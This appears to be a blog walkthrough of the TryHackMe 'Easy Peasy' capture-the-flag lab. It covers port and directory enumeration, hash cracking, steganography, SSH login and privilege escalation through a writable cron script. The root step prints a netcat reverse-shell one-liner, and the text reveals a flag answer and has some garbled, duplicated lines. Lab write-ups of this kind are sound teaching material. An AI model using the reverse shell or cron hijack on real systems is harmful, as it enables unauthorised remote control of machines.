Easy Peasy TryHackMe walkthrough

Easy Peasy

Practice using tools such as Nmap and GoBuster to locate a hidden directory to get initial access to a vulnerable machine. Then escalate your privileges through a vulnerable cronjob. Easy Peasy TryHackMe walkthrough

[Task 1] Enumeration through Nmap

Deploy the machine attached to this task and use nmap to enumerate it.




#1 How many ports are open?
 

nmap -A -Pn -T4 -p- 10.10.158.249 --script vuln






Ans :-




#2 What is the version of nginx?






Ans :-







#3 What is running on the highest port?


Ans :-






Notice we have 3 ports open:

· 80: nginx 1.16.1

· 6498: OpenSSH 7.6p1

· 65524: Apache httpd 2.4.43

[Task 2] Compromising the machine

Now you've enumerated the machine, answer questions and compromise it!


#1 Using GoBuster, find flag 1.


Now, the fun part begins!

The questions in this task require us to find hidden pages and files. Hence, we can start directory scan...



gobuster -e .php,.html,.txt dir -u http://TryHackMeIP/ -w /usr/share/dirb/wordlists/common.txt


OR

• -e  : For extension like .php .html .txt
• dir : For Find a directory
• -u   : For URL
• -w  : For wordlists path

We see robots.txt and a directory named “hidden”. You can check them out, but there is only dead end. For further enumeration, let’s enumerate this “hidden” directory too.



gobuster -e .php,.html,.txt dir -u http://10.10.158.249/hidden/ -w /usr/share/dirb/wordlists/common.txt







 Yeah, /whatever. Let us check what’s inside its source code, shall we?










 Nice! Our first flag with base64 encode. Let’s decode it with:









Ans :- 





#2 Further enumerate the machine, what is flag 2?


Now we can move on to find our 2nd Flag. Let us run gobuster to find hidden directories again.

gobuster dir -u http://10.10.137.230:65524/ -w /usr/share/wordlists/dirb/common.txt



Let’s check the “robots.txt” and notice a hash over there waiting to be cracked.
















The thing is, we may know it is a md5, but cannot crack. I searched everywhere and found the only website to crack! This is the website:

https://md5hashing.net/hash



Just select “Search by all hash types” and have your 2nd Flag!



Ans :- flag{1m_s3c0nd_fl4g}






#3 Locate flag 3.


http://10.10.176.180:65524










We may think this is the default page but keep scrolling down to see your 3rd Flag without any encryption!









Ans :-




#4 What is the hidden directory?


We are not over with this page so let’s view-source:http://10.10.137.230:65524/







Notice the hidden tag on line 194. It’s a bit tricky, because it is NOT base64 and online tools won’t help at all. So I tried every decoder on http://icyberchef.com/  OR https://www.better-converter.com/Encoders-Decoders/Base62-Encode  and finally cracked the hash. The output indicated that it was indeed another hidden directory.









Ans :- 






#5 Using the file found in the hidden directory, find and crack a password hidden in the file.


We may now enter the hidden directory on port 65524:






We notice there is a hash and a picture waiting for us to investigate.

First, let us crack the hash with https://md5hashing.net/hash again:








Ans :-



#6 What is the password to login to the machine via SSH?



It was a hidden password after all we will use just a bit later. (Or now.)


Remember the image on the hidden directory? Let’s download it on our desktop to reveal what’s inside…








Use steghide to extract secrets out of this image and enter the password we just cracked.


You can install it by:


apt install steghide


steghide extract -sf binarycodepixabay.jpg



Something will be extracted up as a secret text. Inside the text, we notice there is a username (boring) and a password as SSH login, but the password is all binary.








 I used this site to convert the binary to text:

https://www.rapidtables.com/convert/number/binary-to-ascii.html







Ans :- 




#7 What is the user flag?


Finally, it is time to ssh into this machine and check what’s going on:


ssh -p 6498 boring10.10.137.230Finally, it is time to ssh into this machine and check what’s going on:


P.S. Don’t forget the flag -p 6498 because this machine’s ssh port is not 22, but 6498!


ssh -p 6498 boring@10.10.175.149 -p 6498






ls -la to see the user.txt waiting for us to be opened.

cat user.txt


I searched “rotated online decode” on Google and found this site to decode this:


https://rot13.com/







Ans :- 






#8 What is the root flag?



To solve the last question, I needed to get a root access. Thanks to the sentence in the description: “Then escalate your privileges through a vulnerable cronjob.” I found the vulnerable cronjob who locates in the /var/www directory. It was a hidden sh file who could be edited and executed. I’ve inserted the following code into the file to get a reverse shell.












rm /tmp/f ; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2>&1 | nc <ip><port> >/tmp/f
















At the same time, I also started a netcat listener to get my root shell. And after a minute I got it. I used the whoami command to check if I really was root. And yes I was. The root.txt was also a hidden file, so I used the ls -la command to list the hidden files and lastly used the cat command to read it.



This CTF was pretty fun to do and also pretty hard. I want to thank Kral4 again for this beautiful CTF and make sure to try it out. Thank you for reading.









Ans :-







Video Tutorial :-

 

 

    

 

 

 

   

 

 

Disclaimer

This was written for educational purpose and pentest only.
The author will not be responsible for any damage ..!
The author of this tool is not responsible for any misuse of the information.
You will not misuse the information to gain unauthorized access.
This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.






I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)